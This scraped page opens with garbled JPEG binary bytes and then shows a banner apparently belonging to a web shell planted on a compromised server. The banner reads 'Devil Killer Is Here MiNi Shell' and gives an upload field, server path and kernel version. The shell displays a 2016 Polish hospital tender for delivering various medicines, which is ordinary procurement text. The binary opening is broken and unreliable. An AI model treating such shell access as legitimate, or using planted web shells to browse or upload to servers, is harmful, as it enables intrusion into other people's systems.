JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161019/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161019/326781-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://zp.wspsa.pl/' target='_blank'>http://zp.wspsa.pl/</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 326781 - 2016
              z dnia 2016-10-19 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Tarnowskie Góry: DOSTAWA LEKÓW RÓŻNYCH DO APTEKI SZPITALA<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Wielospecjalistyczny Szpital Powiatowy Spółka Akcyjna, krajowy numer identyfikacyjny
              24151294000000, ul.
              ul. Pyskowicka 
              ,
              42612  
              Tarnowskie Góry, woj.
              śląskie, państwo
              Polska, tel.
              32 285 40 58, e-mail
              , faks
              32 384 54 04.
              <br />
              Adres strony internetowej (URL): www.wspsa.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Niepubliczny Zakład Opieki Zdrowotnej</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br />http://zp.wspsa.pl/</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br />http://zp.wspsa.pl/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br />Wielspecjalistyczny Szpital Powiatowy S.A. w Tarnowskich Górach przy ul. Pyskowickiej 47-51 - sekretariat, budynek administracji</div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>DOSTAWA LEKÓW RÓŻNYCH DO APTEKI SZPITALA<br /><b>Numer referencyjny: </b>WSP-DZP-2100-46/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Przedmiotem zamówienia jest są sukcesywne dostawy leków różnych. Zamówienie składa się z 10 części tzw. pakietów, z których każdy stanowi oddzielny przedmiot zamówienia:
Pakiet nr 1  Antybiotyki 
Pakiet nr 2  Immunoglobuliny
Pakiet nr 3  Płyny i żywienie
Pakiet nr 4  Gazy anestetyczne
Pakiet nr 5  Żywienie dojelitowe i leki
Pakiet nr 6  Leki ogólne
Pakiet nr 7  Hemofiltracja
Pakiet nr 8  Cytostatyki 1
Pakiet nr 9   Cytostatyki 2
Pakiet nr 10  Heparyny.
2. Szczegółowy opis przedmiotu zamówienia - asortyment oraz ilość znajduje się w załączniku
D.1.-D.10. do SIWZ  - formularz asortymentowo  cenowy.
3. Składane oferty muszą  zawierać pełny zakres przedmiotu zamówienia w zakresie danego pakietu.
4. Zamawiający dopuszcza możliwość składania ofert dotyczących produktów równoważnych do wskazanego przedmiotu zamówienia. Przez produkty równoważne Zamawiający rozumie produkty lecznicze posiadające taki sam skład jakościowy i ilościowy substancji czynnych, postać farmaceutyczną i jeżeli to niezbędne, potwierdzoną właściwie przeprowadzonymi badaniami równoważność biologiczną wobec porównywanego produktu leczniczego, a także tożsame z wskazanym produktem zastosowanie opisane w karcie charakterystyki produktu leczniczego.
5. Wykonawca oświadczy, że:
a)   posiada dokumenty potwierdzające, że proponowane przez niego, wymienione w załączniku nr 1 do SIWZ leki są zarejestrowane w Urzędzie Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych, zgodnie z wymaganiami ustawy Prawo Farmaceutyczne z dnia 06.09.2001r. (Dz. U. Z 2008r. Nr 45, poz. 271 z późn. zm.) oraz z innymi obowiązującymi przepisami prawnymi w tym zakresie,
b) przedmiot zamówienia spełnia wskazania Polskich Norm przenoszących europejskie normy zharmonizowane,
c)  dostarczone w ramach niniejszej umowy produkty lecznicze będą wysokiej jakości, o właściwych parametrach użytkowych i ważnym okresie przydatności do użycia. 
5. Zamawiający zastrzega sobie prawo realizowania zamówień w ilościach uzależnionych od rzeczywistych potrzeb i posiadanych środków oraz do ograniczenia zamówienia w zakresie rzeczowym i ilościowym, co nie jest odstąpieniem od umowy nawet w części.
6. Zamawiający zastrzega sobie prawo do zmiany limitów ilościowych zamawianego asortymentu w stosunku do określonych w poszczególnych pozycjach pakietu, stanowiącego załącznik do umowy zarówno In plusjak i in minus, bez zmiany wartości brutto przedmiotu umowy określonej w § 2 ust. 1 projektu umowy, a Wykonawca wyraża na to zgodę.
7. Okres ważności leków minimum 6 miesięcy od daty dostawy.
8.	Zamawiający wymaga dostarczenia kompatybilnych parowników na czas trwania umowy przetargowej
(dotyczy pakietu nr 4).
9.	Zamawiający wymaga użyczenia na czas trwania umowy 1 pompy do żywienia dojelitowego
(dotyczy pakietu nr 5).
<br /><br /><b>II.5) Główny kod CPV: </b>33600000-0<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 2<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający uzna warunek za spełniony jeśli Wykonawca złoży koncesję lub zezwolenie na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym (koncesja lub zezwolenie Głównego Inspektora Farmaceutycznego na prowadzenie hurtowni farmaceutycznej,  zgodnie z ustawą
z  dnia 6 września 2001 roku Prawo farmaceutyczne (Dz. U. z 2001r Nr 126, poz.1381 z póź. zm.)
oraz z innymi obowiązującymi przepisami prawymi w tym zakresie, a w przypadku oferowania środków odurzających lub substancji psychotropowych, na obrót hurtowy tymi środkami lub substancjami
tj. posiadanie zezwolenia na obrót środkami odurzającymi lub substancjami psychotropowymi będącymi produktami leczniczymi  zgodnie z ustawą z dnia 29 lipca 2005 roku Ustawa o przeciwdziałaniu narkomanii (Dz. U. z 2005r. nr 179 poz. 1485 z późn. zm.);<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 
1) nie podlegają wykluczeniu; 
2) spełniają warunki udziału w postępowaniu dotyczące: 
a) kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów. 
Zamawiający uzna warunek za spełniony jeśli Wykonawca złoży koncesję lub zezwolenie na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym (koncesja lub zezwolenie Głównego Inspektora Farmaceutycznego na prowadzenie hurtowni farmaceutycznej,  zgodnie z ustawą
z  dnia 6 września 2001 roku Prawo farmaceutyczne (Dz. U. z 2001r Nr 126, poz.1381 z póź. zm.)
oraz z innymi obowiązującymi przepisami prawymi w tym zakresie, a w przypadku oferowania środków odurzających lub substancji psychotropowych, na obrót hurtowy tymi środkami lub substancjami
tj. posiadanie zezwolenia na obrót środkami odurzającymi lub substancjami psychotropowymi będącymi produktami leczniczymi  zgodnie z ustawą z dnia 29 lipca 2005 roku Ustawa o przeciwdziałaniu narkomanii (Dz. U. z 2005r. nr 179 poz. 1485 z późn. zm.);
b) sytuacji ekonomicznej lub finansowej. 
c) zdolności technicznej lub zawodowej. 
 3) Potwierdzą, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego tj. Wykonawca jest w posiadaniu niżej wymienionych dokumentów:
- dokumentów potwierdzających, że proponowane przez niego, wymienione w załączniku nr D
do SIWZ leki są zarejestrowane w Urzędzie Rejestracji Produktów Leczniczych, Wyrobów Medycznych 
i Produktów Biobójczych, zgodnie z wymaganiami ustawy Prawo Farmaceutyczne
z dnia 06.09.2001r. (Dz. U. Z 2008r. Nr 45, poz. 271 z późn. zm.) oraz z innymi obowiązującymi przepisami prawnymi w tym zakresie.
</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">a) odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy;
b) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
c) zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Załączniki do SIWZ C, D, E</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin realizacji dostaw CITO</td><td>20</td></tr><tr><td>Szybkość reakcji na reklamacje</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
